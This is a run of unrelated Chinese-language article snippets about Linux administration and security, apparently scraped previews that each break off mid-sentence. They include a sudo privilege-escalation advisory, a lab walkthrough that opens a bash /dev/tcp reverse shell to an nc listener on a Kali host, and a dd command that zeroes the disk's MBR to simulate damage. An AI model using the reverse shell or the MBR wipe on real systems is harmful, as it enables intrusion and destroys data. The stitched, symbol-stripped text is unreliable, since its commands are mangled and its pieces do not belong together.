2021年01月27日，RedHat官方发布了sudo缓冲区/栈溢出漏洞的风险通告，普通用户可以通过利用此漏洞，而无需进行身份验证，成功获取root权限。据报道这个漏洞已存在十年了，大部分的linux系统都存在这个sudo漏洞。站在攻击方的角度，这就是sudo提权的新姿势；站在防守方的角度，这可能是近期最需要去重视的漏洞了。漏洞编

1\.后台运行的例子nohupcommand/dev/null2&1&解释：nohup:nohangup，不挂断地运行命令。只用nohup命令，关闭终端，进程还存在。若在终端中直接使用Ctrlc,则会关闭进程。command：command是用户输入的命

实验环境CentOS6.5：192.168.0.3kali2.0：192.168.0.4方法1：反弹shell命令如下：bashi&/dev/tcp/ip/port0&1首先，使用nc在kali上监听端口：nclvp7777!0DdE723LF1.png(h

点击上方“杰哥的IT之旅”，选择“置顶公众号”干货、福利第一时间送达！!(https://oscimg.oschina.net/oscnet/dcc4f8f19faf4fc2835cf9193825fe71.gif)!(https://oscimg.oschina.net/oscnet/a30ae6a1722746

文件编程　　文件描述符fd数字（文件的身份证，代表文件身份），通过fd可找到正在操作或需要打开的文件。基本函数操作：1）打开/创建文件intopen(constcharpathname,intflag,mode_tmode)成功：返回文件的fd失败：返回

通过为防火墙提供有关对来自某个源，到某个目的地或具有特定协议类型的信息包要执行操作的指令及规则控制信息包的过滤。通过使用Netfilter/iptables系统提供的特殊命令iptables建立这些规则，并将其添加到内核空间的特定信息包过滤表内的链中。添加，除去及编辑规则命令的一般语法如下：$iptables\ttable\comman

FHS标准FHS定义了两层规范，第一层是，/下面的各个目录应该要放什么文件数据，例如/etc应该要放置设置文件，/bin与/sbin则应该要放置可执行文件等等。第二层则是针对/usr及/var这两个目录的子目录来定义。例如/var/log放置系统登录文件、/usr/share放置共享数据等等。获取当前路径：pw

备份MBR扇区数据ddif/dev/sda of/data/abc.bakbs512count1损坏扇区文件将/dev/zreo中的数据拷贝至sda的MBR扇区中，以达到模拟破坏MBR扇区的效果。ddif/dev/zeroof/dev/sdabs512count1重启使用光盘引导模式进入救援模式输入“1” 回车 ，到了shell后再回车创